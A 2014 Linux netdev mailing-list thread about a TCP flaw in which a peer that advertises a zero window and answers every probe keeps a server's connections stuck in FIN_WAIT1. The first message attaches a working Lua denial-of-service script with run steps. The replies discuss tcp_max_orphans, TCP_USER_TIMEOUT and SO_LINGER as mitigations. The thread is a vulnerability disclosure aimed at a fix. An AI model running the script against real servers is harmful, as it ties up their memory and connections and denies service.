* TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
@ 2014-09-15 16:11 Andrey Dmitrov
  2014-09-15 19:43 ` Neal Cardwell
  2014-09-15 23:15 ` Hannes Frederic Sowa
  0 siblings, 2 replies; 14+ messages in thread
From: Andrey Dmitrov @ 2014-09-15 16:11 UTC (permalink / raw)
  To: netdev; +Cc: Alexandra N. Kossovsky, Konstantin Ushakov

[-- Attachment #1: Type: text/plain, Size: 2053 bytes --]

Greetings,

there is a possible vulnerability in the TCP stack. Closing a socket after
the peer has advertised a TCP zero window leaves the connection stuck in
the FIN_WAIT1 state. The FIN-ACK packet is neither sent nor retransmitted,
so the connection stays alive, detached from any socket, for as long as
the peer replies to the zero window probes. In this way it is possible to
create a large number of connections that remain in the FIN_WAIT1 state
forever.

Linux version 3.13-1-amd64 (debian-kernel@lists.debian.org) (gcc version 
4.8.2 (Debian 4.8.2-16) ) #1 SMP Debian 3.13.10-1 (2014-04-15)

I've written a Lua script to reproduce this issue; please find it
attached. I used it with two hosts, host_A (victim) and host_B
(attacker), which are directly connected to each other. host_A has
lighttpd installed and running, but any open TCP listening socket on
host_A can be attacked. If host_A closes a connection established with
the attacker, the connection gets stuck in the FIN_WAIT1 state. The
script creates a number of TCP connections to the victim and replies to
the zero window probe packets.

The test requires lua, tcpdump and nemesis on the host_B:
aptitude install lua5.1 lua5.1-posix nemesis tcpdump

How to run the test:
1. Run an HTTP daemon on host_A (I used lighttpd).
2. Copy the test script attack.lua to host_B.
3. Fill in the configuration of the tested interfaces (source and
destination IP and MAC addresses) at the beginning of attack.lua. You can
set the maximum number of connections in the variable *limit*; the
default is 500.
4. Set a fake MAC address for the victim's interface in the host_B ARP
table. This prevents replies (RST) from the host_B system from reaching
host_A:
     sudo arp -s <host_A IP addr> <any MAC address>
5. Run the test script on host_B:
     sudo ./attack.lua

After ~10 minutes you will see 500 connections in the FIN_WAIT1 state on
host_A:
netstat | grep FIN_WAIT1 | wc -l
500

The connections stay alive even if you stop the HTTP daemon.

Thanks,
Andrey Dmitrov

[-- Attachment #2: attack.lua --]
[-- Type: text/x-lua, Size: 3635 bytes --]

#!/usr/bin/lua

require("posix")
require("math")
require("os")

--~ Network configuration
--~ Source = attacker
--~ Destination = victim
local limit = 500 -- Maximum connections number
local iface = "eth3" -- Source (attacker) interface
local src_mac = "00:0f:53:01:39:94" -- Actual source interface MAC
local dst_mac = "00:0f:53:01:39:7c" -- Actual destination (victim) interface MAC
local src = "10.0.5.1" -- Source IP
local dst = "10.0.5.2" -- The destination IP
local dst_port = 80 -- The destination port

local nemesis = string.format("nemesis tcp -d %s -S %s -D %s -y %d -H %s -M %s",
                              iface, src, dst, dst_port, src_mac, dst_mac)


--~ Set a fake MAC for the victim interface in the ARP table so that replies
--~ from the attacker's own TCP stack never reach the victim
--~ os.execute(string.format("arp -s %s 00:0c:29:c0:94:bf", dst))

math.randomseed(os.time())

function get_port(cs, idx)
  local port 
  local conn
  local i
  local ex

  repeat
    port = math.random(30000, 60000)
    ex = false

    for i, conn in pairs(cs) do
      if conn.port == port then
        ex = true
        break
      end
    end
  until not ex

  return port
end

function send_syn(conn, port, seqn)
  local cmd

  conn.port = port
  conn.seqn = (seqn + math.random(1000, 5000)) % 4294967296 -- wrap at 2^32

  cmd = string.format("%s -fS -x %d -s %s -a 0 -w 29200 >/dev/null", nemesis,
                      conn.port, tostring(conn.seqn))
  print(cmd)
  os.execute(cmd)
  conn.seqn = conn.seqn + 1

  return seqn
end

function get_conn_by_port(cs, port)
  local i
  local conn

  for i, conn in pairs(cs) do
    if tonumber(conn.port) == tonumber(port) then
      return conn
    end
  end

  return nil
end

function send_ack(conn, packet, ackn)
  local win = 0 -- always advertise a zero window
  local cmd

  if not ackn or not conn.seqn then
    return
  end

  conn.ackn = ackn
  cmd = string.format("%s -fA -x %d -s %s -a %s -w %d >/dev/null", nemesis,
                      conn.port, tostring(conn.seqn), tostring(ackn), win)
  print(cmd)
  os.execute(cmd)
end

function send_reply(cs, packet)
  local conn

  if not packet then
    return
  end

  conn = get_conn_by_port(cs, packet.src_port)
  if not conn then
    return
  end

  if packet.flags == "S." then
    send_ack(conn, packet, packet.seqn + 1)
  elseif packet.flags == "." then
    if packet.seqn == nil then
      packet.seqn = conn.ackn
    end
    send_ack(conn, packet, packet.seqn)
  end
end

function get_packet(line)
  local packet = {}
  local psrc
  local pdst

  if not line then
    return nil
  end

  --~ Skip unexpected and outgoing packets
  psrc = string.find(line, src)
  pdst = string.find(line, dst)
  if not psrc or not pdst or psrc < pdst then
    return nil
  end

  packet.src_port = line:match(src .. ".(%d+)")
  packet.dst_port = line:match(dst .. ".(%d+)")
  packet.flags = line:match("%[([%a,%.]+)%]")
  packet.seqn = line:match("seq (%d+)")
  packet.ackn = line:match("ack (%d+)")
  print(packet.src_port, packet.dst_port, packet.flags, packet.seqn, packet.ackn)

  return packet
end

function main_loop()
  local packet
  local cs = {}
  local idx = 0
  local f
  local seqn = 1971746917
  local prev_time = 0
  local curr_time

  f = io.popen("tcpdump -i " .. iface .. " -l -n tcp src port 80")

  while true do
    if idx < limit then
      curr_time = os.time()
      if curr_time ~= prev_time then
        prev_time = curr_time
        idx = idx + 1
        cs[idx] = {}
        cs[idx].idx = idx
        seqn = send_syn(cs[idx], get_port(cs, idx), seqn)
      end
    end

    packet = get_packet(f:read("*l"))
    send_reply(cs, packet)

  end

  io.close(f)
end

main_loop()

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 16:11 TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised Andrey Dmitrov
@ 2014-09-15 19:43 ` Neal Cardwell
  2014-09-16  9:29   ` Andrey Dmitrov
  2014-09-15 23:15 ` Hannes Frederic Sowa
  1 sibling, 1 reply; 14+ messages in thread
From: Neal Cardwell @ 2014-09-15 19:43 UTC (permalink / raw)
  To: Andrey Dmitrov; +Cc: Netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On Mon, Sep 15, 2014 at 12:11 PM, Andrey Dmitrov
<andrey.dmitrov@oktetlabs.ru> wrote:
> It is possible to create a lot of connections in the same manner which will be in FIN_WAIT1 state forever.
...
> After ~10 minutes you will see 500 connections in the FIN_WAIT1 state on the host_A:
> netstat | grep FIN_WAIT1 | wc -l
> 500

Thanks for the report. In your tests, have you ever seen the number of
such connections exceed net.ipv4.tcp_max_orphans?

Can you set net.ipv4.tcp_max_orphans to a low value and verify that it
limits the number of such connections? AFAICT it should.
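
One way to run this check is to compare the number of FIN_WAIT1 sockets
with the orphan limit. The sketch below is only illustrative: it assumes a
Linux host whose IPv4 sockets are listed in /proc/net/tcp, where the fourth
column holds the TCP state in hex and 04 is FIN_WAIT1. The function names
are made up for this example.

```python
from pathlib import Path

FIN_WAIT1 = 0x04  # TCP_FIN_WAIT1 as printed in the "st" column of /proc/net/tcp


def count_state(proc_net_tcp_text, state=FIN_WAIT1):
    """Count sockets in the given TCP state in /proc/net/tcp-formatted text."""
    count = 0
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) > 3 and int(fields[3], 16) == state:
            count += 1
    return count


def read_max_orphans(path="/proc/sys/net/ipv4/tcp_max_orphans"):
    """Return the current net.ipv4.tcp_max_orphans value."""
    return int(Path(path).read_text())
```

On host_A, `count_state(Path("/proc/net/tcp").read_text())` can then be
compared with `read_max_orphans()` while the test script is running.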

thanks,
neal

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 16:11 TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised Andrey Dmitrov
  2014-09-15 19:43 ` Neal Cardwell
@ 2014-09-15 23:15 ` Hannes Frederic Sowa
  2014-09-15 23:37   ` Yuchung Cheng
                     ` (2 more replies)
  1 sibling, 3 replies; 14+ messages in thread
From: Hannes Frederic Sowa @ 2014-09-15 23:15 UTC (permalink / raw)
  To: Andrey Dmitrov; +Cc: netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On Mon, 2014-09-15 at 20:11 +0400, Andrey Dmitrov wrote:
> Greetings,
>
> there is a possible vulnerability in the TCP stack. Closing a socket after
> the peer has advertised a TCP zero window leaves the connection stuck in
> the FIN_WAIT1 state. The FIN-ACK packet is neither sent nor retransmitted,
> so the connection stays alive, detached from any socket, for as long as
> the peer replies to the zero window probes. In this way it is possible to
> create a large number of connections that remain in the FIN_WAIT1 state
> forever.

Also thanks for the report.

Do you see any tcp window repair messages in dmesg? Can you send some
output of ss -oemit state FIN-WAIT-1 from the target host?

I thought they should time out after RTO_MAX (~2 minutes).

Thanks,
Hannes

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 23:15 ` Hannes Frederic Sowa
@ 2014-09-15 23:37   ` Yuchung Cheng
  2014-09-16 12:49     ` Andrey Dmitrov
  2014-09-16  1:50   ` Eric Dumazet
  2014-09-16 12:47   ` Andrey Dmitrov
  2 siblings, 1 reply; 14+ messages in thread
From: Yuchung Cheng @ 2014-09-15 23:37 UTC (permalink / raw)
  To: Hannes Frederic Sowa
  Cc: Andrey Dmitrov, netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On Mon, Sep 15, 2014 at 4:15 PM, Hannes Frederic Sowa
<hannes@stressinduktion.org> wrote:
> Also thanks for the report.
>
> Do you see any tcp window repair messages in dmesg? Can you send some
> output of ss -oemit state FIN-WAIT-1 from the target host?
>
> I thought they should timeout after RTO_MAX (~2 minutes).
I think the vulnerability comes from the peer/attacker actually
responding to the probes, which evades the orphan count and memory checks
in tcp_probe_timer(). This is a gray area: legitimate on the wire, but
suspiciously misbehaving?
Maybe the TCP_USER_TIMEOUT socket option could let apps cover conditions
like these.
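
The effect described here can be illustrated with a toy model. It is not
the kernel code: it only assumes that the stack counts consecutive
unanswered zero window probes, gives up once that count exceeds a limit,
and resets the count whenever the peer ACKs a probe. The names
`simulate_probes`, `peer_answers` and `max_probes`, and the default limit
of 8, are invented for the sketch.

```python
def simulate_probes(peer_answers, max_probes=8, rounds=1000):
    """Return the round at which the connection is aborted, or None if it survives.

    Toy model: `unanswered` counts consecutive probes without an ACK and is
    reset whenever the peer replies, so a peer that always replies is never
    dropped by this check.
    """
    unanswered = 0
    for round_no in range(1, rounds + 1):
        if unanswered > max_probes:
            return round_no  # too many probes without a reply: give up
        unanswered += 1  # send one zero window probe
        if peer_answers(round_no):
            unanswered = 0  # an ACK (still win=0) resets the counter
    return None
```

In this model a silent peer (`lambda n: False`) is dropped after a bounded
number of rounds, while a peer that ACKs every probe (`lambda n: True`)
survives all of them.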

>
> Thanks,
> Hannes
* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 23:15 ` Hannes Frederic Sowa
  2014-09-15 23:37   ` Yuchung Cheng
@ 2014-09-16  1:50   ` Eric Dumazet
  2014-09-16  8:37     ` Hannes Frederic Sowa
  2014-09-16 12:47   ` Andrey Dmitrov
  2 siblings, 1 reply; 14+ messages in thread
From: Eric Dumazet @ 2014-09-16  1:50 UTC (permalink / raw)
  To: Hannes Frederic Sowa
  Cc: Andrey Dmitrov, netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On Tue, 2014-09-16 at 01:15 +0200, Hannes Frederic Sowa wrote:
> Also thanks for the report.
> 
> Do you see any tcp window repair messages in dmesg? Can you send some
> output of ss -oemit state FIN-WAIT-1 from the target host?
> 
> I thought they should timeout after RTO_MAX (~2 minutes).


Why? If a TARPIT module always answers zero window probes, these
sessions would last forever.

This is a rather old problem ;)

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-16  1:50   ` Eric Dumazet
@ 2014-09-16  8:37     ` Hannes Frederic Sowa
  0 siblings, 0 replies; 14+ messages in thread
From: Hannes Frederic Sowa @ 2014-09-16  8:37 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Andrey Dmitrov, netdev, Alexandra N. Kossovsky, Konstantin Ushakov



On Tue, Sep 16, 2014, at 03:50, Eric Dumazet wrote:
> 
> Why ? If a TARPIT module always answer to zero window probes, these
> sessions would last forever.

The first paragraph of the original mail didn't read as if the peer would
constantly answer the zero window probes, but after looking at the
attack.lua source I came to the same conclusion.

Bye,
Hannes

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 19:43 ` Neal Cardwell
@ 2014-09-16  9:29   ` Andrey Dmitrov
  0 siblings, 0 replies; 14+ messages in thread
From: Andrey Dmitrov @ 2014-09-16  9:29 UTC (permalink / raw)
  To: Neal Cardwell; +Cc: Netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On 15/09/14 23:43, Neal Cardwell wrote:
> On Mon, Sep 15, 2014 at 12:11 PM, Andrey Dmitrov
> <andrey.dmitrov@oktetlabs.ru> wrote:
>> It is possible to create a lot of connections in the same manner which will be in FIN_WAIT1 state forever.
> ...
>> After ~10 minutes you will see 500 connections in the FIN_WAIT1 state on the host_A:
>> netstat | grep FIN_WAIT1 | wc -l
>> 500
> Thanks for the report. In your tests, have you ever seen the number of
> such connections exceed net.ipv4.tcp_max_orphans?
>
> Can you set net.ipv4.tcp_max_orphans to a low value and verify that it
> limits the number of such connections? AFAICT it should.
I set net.ipv4.tcp_max_orphans to 100, and it does limit the number of
connections. From what I saw, net.ipv4.tcp_max_orphans can be exceeded,
but only for a short time: the number of connections in the FIN_WAIT1
state peaked at 196 and then dropped rather quickly to ~100.

Thanks,
Andrey

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 23:15 ` Hannes Frederic Sowa
  2014-09-15 23:37   ` Yuchung Cheng
  2014-09-16  1:50   ` Eric Dumazet
@ 2014-09-16 12:47   ` Andrey Dmitrov
  2014-09-16 13:09     ` Eric Dumazet
  2 siblings, 1 reply; 14+ messages in thread
From: Andrey Dmitrov @ 2014-09-16 12:47 UTC (permalink / raw)
  To: Hannes Frederic Sowa; +Cc: netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On 16/09/14 03:15, Hannes Frederic Sowa wrote:
> Also thanks for the report.
>
> Do you see any tcp window repair messages in dmesg? Can you send some
> output of ss -oemit state FIN-WAIT-1 from the target host?
Hannes,
no, there aren't any messages in dmesg until net.ipv4.tcp_max_orphans is
reached.

# ss -oemit state FIN-WAIT-1
0 1 10.0.5.2:http 10.0.5.1:35973    timer:(persist,23sec,0) ino:0 sk:ffff880226756140 ---
      skmem:(r0,rb374400,t0,tb46080,f4294966016,w1280,o0,bl0) cubic mss:536 cwnd:10 retrans:0/1 rcv_space:29200
0 1 10.0.5.2:http 10.0.5.1:35320    timer:(persist,26sec,0) ino:0 sk:ffff88020b5cf180 ---
      skmem:(r0,rb374400,t0,tb46080,f4294966016,w1280,o0,bl0) cubic rto:2964 rtt:988/494 mss:536 cwnd:10 send 43.4Kbps rcv_space:29200
0 1 10.0.5.2:http 10.0.5.1:56784    timer:(persist,20sec,0) ino:0 sk:ffff88022543e800 ---
      skmem:(r0,rb374400,t0,tb46080,f4294966016,w1280,o0,bl0) cubic rto:2964 rtt:988/494 mss:536 cwnd:10 send 43.4Kbps rcv_space:29200
0 1 10.0.5.2:http 10.0.5.1:45866    timer:(persist,22sec,0) ino:0 sk:ffff88020b9d3140 ---
      skmem:(r0,rb374400,t0,tb46080,f4294966016,w1280,o0,bl0) cubic rto:2952 rtt:984/492 mss:536 cwnd:10 send 43.6Kbps rcv_space:29200
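
The relevant fields of this output can be pulled out programmatically. The
sketch below is a hedged illustration, not a general ss parser: it assumes
the `timer:(name,expiry,retrans)` and `skmem:(...)` layouts shown above,
and reading the large `f` value as a 32-bit counter that has wrapped below
zero is an interpretation, not something stated in this thread. All
function names are made up.

```python
import re

TIMER_RE = re.compile(r"timer:\((\w+),([^,]+),(\d+)\)")
SKMEM_RE = re.compile(r"skmem:\(([^)]*)\)")


def parse_timer(text):
    """Return (timer_name, expiry, retransmits), or None if there is no timer field."""
    m = TIMER_RE.search(text)
    return (m.group(1), m.group(2), int(m.group(3))) if m else None


def parse_skmem(text):
    """Return the skmem counters as a dict keyed by their letter prefix."""
    m = SKMEM_RE.search(text)
    if not m:
        return {}
    counters = {}
    for item in m.group(1).split(","):
        fm = re.fullmatch(r"([a-z]+)(\d+)", item.strip())
        if fm:
            counters[fm.group(1)] = int(fm.group(2))
    return counters


def as_signed32(value):
    """Reinterpret an unsigned 32-bit value as a signed one."""
    return value - (1 << 32) if value >= (1 << 31) else value
```

Applied to the text of the first record, `parse_timer` reports the
`persist` timer, and `as_signed32(4294966016)` is -1280, the negative of
the `w1280` value in the same record.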

Thanks,
Andrey

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-15 23:37   ` Yuchung Cheng
@ 2014-09-16 12:49     ` Andrey Dmitrov
  0 siblings, 0 replies; 14+ messages in thread
From: Andrey Dmitrov @ 2014-09-16 12:49 UTC (permalink / raw)
  To: Yuchung Cheng, Hannes Frederic Sowa
  Cc: netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On 16/09/14 03:37, Yuchung Cheng wrote:
> I think the vulnerability comes from the peer/attacker actually
> responds to the probes to evade the orphan counts or memory checks in
> tcp_probe_timer(). This is a gray area of being legit but suspiciously
> mis-behaving?
> maybe have socket option TCP_USER_TIMEOUT for apps to cover conditions
> like these.
Yuchung,
I've tried the TCP_USER_TIMEOUT socket option, but unfortunately it
does not help here. I think this is because all packets are
acknowledged.

To everybody,
As I understand it, the connection behaves significantly differently
once a zero window is advertised. In that case there is no guarantee
that the connection will actually be closed in finite time after the
socket is closed, and at the moment this probably cannot be controlled.
If, on the other hand, no zero window was advertised, the user can be
sure that the connection is closed in finite time regardless of what the
peer does, and can even configure that time with the corresponding
timeouts. In other words, a user has many options for configuring
different timeouts, but whatever he sets, there is no guarantee that the
connection will be closed at all.

Thanks,
Andrey

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-16 12:47   ` Andrey Dmitrov
@ 2014-09-16 13:09     ` Eric Dumazet
  2014-09-16 14:08       ` Andrey Dmitrov
  2014-09-16 15:11       ` Yuchung Cheng
  0 siblings, 2 replies; 14+ messages in thread
From: Eric Dumazet @ 2014-09-16 13:09 UTC (permalink / raw)
  To: Andrey Dmitrov
  Cc: Hannes Frederic Sowa, netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On Tue, 2014-09-16 at 16:47 +0400, Andrey Dmitrov wrote:
> On 16/09/14 03:15, Hannes Frederic Sowa wrote:
> > Also thanks for the report.
> >
> > Do you see any tcp window repair messages in dmesg? Can you send some
> > output of ss -oemit state FIN-WAIT-1 from the target host?
> Hannes,
> no, there aren't any messages in dmesg until net.ipv4.tcp_max_orphans is 
> achieved.


Andrey, you should take a look at Labrea Tarpit,

http://www.sans.org/reading-room/whitepapers/casestudies/smart-ids-hybrid-labrea-tarpit-33254

What happens is the following:

A normal TCP session is established, and traffic is sent from server to
client.

The client advertises a zero window.

1) This can be normal, because the application that should read the
client's receive queue no longer does. (For example, it's an ssh session
and output to the terminal is blocked by CTRL-S.) There are valid cases
where this blocks for many hours.

2) This can be faked by a malicious peer that wants to force the server
into this mode (unable to send more data, data stuck in the output queue,
one probe sent every RTO). This is a very well-known way to make servers
consume a lot of kernel memory and eventually OOM.


Then the server sends a probe every RTO, and the client responds with an
ACK with win=0.

The TCP specs say this can last forever, even if the socket is eventually
closed by the server (because it gave up) and enters FIN_WAIT.

Supposedly, a server that is about to give up might tell the TCP stack:
do not insist on sending the remaining bytes you have in the output queue
(I, the application, have already waited for a very reasonable time).

Normally SO_LINGER or TCP_USER_TIMEOUT could be used. This requires a
system call before doing the close().

1) TCP_USER_TIMEOUT would be the right fit for this, but its current
implementation does not take the probes sent into account, even in
FIN_WAIT state, when in this zero window mode. A patch would be needed.

2) SO_LINGER with timeout=0 might work.

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-16 13:09     ` Eric Dumazet
@ 2014-09-16 14:08       ` Andrey Dmitrov
  2014-09-16 15:11       ` Yuchung Cheng
  1 sibling, 0 replies; 14+ messages in thread
From: Andrey Dmitrov @ 2014-09-16 14:08 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Hannes Frederic Sowa, netdev, Alexandra N. Kossovsky, Konstantin Ushakov

On 16/09/14 17:09, Eric Dumazet wrote:
> 1) TCP_USER_TIMEOUT would be the fit for this, but its current
> implementation do not take care of the probes sent, even in FIN_WAIT
> state when in this zero window mode. A patch would be needed.
>
> 2) SO_LINGER, timeout=0 might work.
I tried setting SO_LINGER with a non-zero timeout before reporting the
bug, and it did not help. But I've just tried again with a zero timeout
(l_linger=0) and it works: the connection is aborted immediately when the
socket is closed, and an RST packet is sent. It looks like a bug that
SO_LINGER with a non-zero timeout does not abort the connection.
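
For reference, the working variant (l_onoff=1, l_linger=0) can be set up
as in the sketch below. It is a minimal illustration in Python rather than
the code used in the test; the helper names are made up, and it assumes a
platform where `struct linger` is two C ints, as on Linux.

```python
import socket
import struct


def enable_abortive_close(sock):
    """Set SO_LINGER with l_onoff=1, l_linger=0 so that close() aborts the connection.

    With this setting close() discards unsent data and resets the
    connection (RST) instead of leaving it in FIN_WAIT1.
    """
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0))


def get_linger(sock):
    """Return the current (l_onoff, l_linger) pair of the socket."""
    raw = sock.getsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.calcsize("ii"))
    return struct.unpack("ii", raw)
```

A server would call `enable_abortive_close(conn)` on the accepted socket
right before `conn.close()`, once it has decided to give up on the peer.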

Thanks,
Andrey

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-16 13:09     ` Eric Dumazet
  2014-09-16 14:08       ` Andrey Dmitrov
@ 2014-09-16 15:11       ` Yuchung Cheng
  2014-09-16 16:31         ` Neal Cardwell
  1 sibling, 1 reply; 14+ messages in thread
From: Yuchung Cheng @ 2014-09-16 15:11 UTC (permalink / raw)
  To: Eric Dumazet
  Cc: Andrey Dmitrov, Hannes Frederic Sowa, netdev,
	Alexandra N. Kossovsky, Konstantin Ushakov

On Tue, Sep 16, 2014 at 6:09 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> Normally SO_LINGER could be used, or TCP_USER_TIMEOUT. This requires a
> system call before doing the close().
>
> 1) TCP_USER_TIMEOUT would be the fit for this, but its current
> implementation do not take care of the probes sent, even in FIN_WAIT
> state when in this zero window mode. A patch would be needed.
Yes that's what I meant. I am proposing we should patch
TCP_USER_TIMEOUT to do this.


>
> 2) SO_LINGER, timeout=0 might work.
* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-16 15:11       ` Yuchung Cheng
@ 2014-09-16 16:31         ` Neal Cardwell
  2014-09-16 17:04           ` Eric Dumazet
  0 siblings, 1 reply; 14+ messages in thread
From: Neal Cardwell @ 2014-09-16 16:31 UTC (permalink / raw)
  To: Yuchung Cheng
  Cc: Eric Dumazet, Andrey Dmitrov, Hannes Frederic Sowa, netdev,
	Alexandra N. Kossovsky, Konstantin Ushakov

On Tue, Sep 16, 2014 at 11:11 AM, Yuchung Cheng <ycheng@google.com> wrote:
> On Tue, Sep 16, 2014 at 6:09 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
>> Normally SO_LINGER could be used, or TCP_USER_TIMEOUT. This requires a
>> system call before doing the close().
>>
>> 1) TCP_USER_TIMEOUT would be the fit for this, but its current
>> implementation do not take care of the probes sent, even in FIN_WAIT
>> state when in this zero window mode. A patch would be needed.
> Yes that's what I meant. I am proposing we should patch
> TCP_USER_TIMEOUT to do this.

We should probably be careful here. It would be a non-trivial change
in semantics to have TCP_USER_TIMEOUT solve this issue.

TCP_USER_TIMEOUT, in the man page, the RFC, and the existing
code, is about a user-specific limit on the maximum amount of time the
TCP stack will attempt to transmit a single packet. (For example, the
man page: "specifies the maximum amount of time in milliseconds that
transmitted data may remain unacknowledged before TCP will forcibly
close the corresponding connection"). Any existing apps that are
setting TCP_USER_TIMEOUT are probably setting it to something in the
range of seconds to a few minutes, and may reasonably expect their
orphaned connections to last minutes to hours, as long as they are
making progress (each of the packets is ACKed in the
seconds-to-minutes range).

By contrast, AFAICT what we are talking about here for these
ZWP-forever/tarpit scenarios is to be able to cap the maximum overall
lifetime of an orphan connection. That's a different parameter, and
folks might want to set it in the minutes-to-hours range.
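
For context, this is how an application sets the option under discussion.
The sketch is illustrative only: it assumes Linux, falls back to the Linux
option number 18 if the Python build does not export
`socket.TCP_USER_TIMEOUT`, and the helper names are made up. As reported
earlier in this thread, setting the option did not end the zero window
connections on the tested kernel.

```python
import socket

# Linux value of TCP_USER_TIMEOUT, used only if the socket module lacks the constant.
TCP_USER_TIMEOUT = getattr(socket, "TCP_USER_TIMEOUT", 18)


def set_user_timeout(sock, timeout_ms):
    """Limit how long transmitted data may stay unacknowledged, in milliseconds."""
    sock.setsockopt(socket.IPPROTO_TCP, TCP_USER_TIMEOUT, timeout_ms)


def get_user_timeout(sock):
    """Return the TCP_USER_TIMEOUT currently set on the socket, in milliseconds."""
    return sock.getsockopt(socket.IPPROTO_TCP, TCP_USER_TIMEOUT)
```

For example, `set_user_timeout(conn, 30000)` asks for a 30-second limit
per unacknowledged transmission; it does not cap the overall lifetime of
an orphaned connection, which is the separate parameter described above.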

neal

* Re: TCP connection will hang in FIN_WAIT1 after closing if zero window is advertised
  2014-09-16 16:31         ` Neal Cardwell
@ 2014-09-16 17:04           ` Eric Dumazet
  0 siblings, 0 replies; 14+ messages in thread
From: Eric Dumazet @ 2014-09-16 17:04 UTC (permalink / raw)
  To: Neal Cardwell
  Cc: Yuchung Cheng, Andrey Dmitrov, Hannes Frederic Sowa, netdev,
	Alexandra N. Kossovsky, Konstantin Ushakov

On Tue, 2014-09-16 at 12:31 -0400, Neal Cardwell wrote:
> By contrast, AFAICT what we are talking about here for these
> ZWP-forever/tarpit scenarios is to be able to cap the maximum overall
> lifetime of an orphan connection. That's a different parameter, and
> folks might want to set it in the minutes-to-hours range.

Right, but TCP_USER_TIMEOUT should be improved nevertheless?

Then we might add support for another safety mechanism, but the bulk
of TARPIT attacks would already be handled.
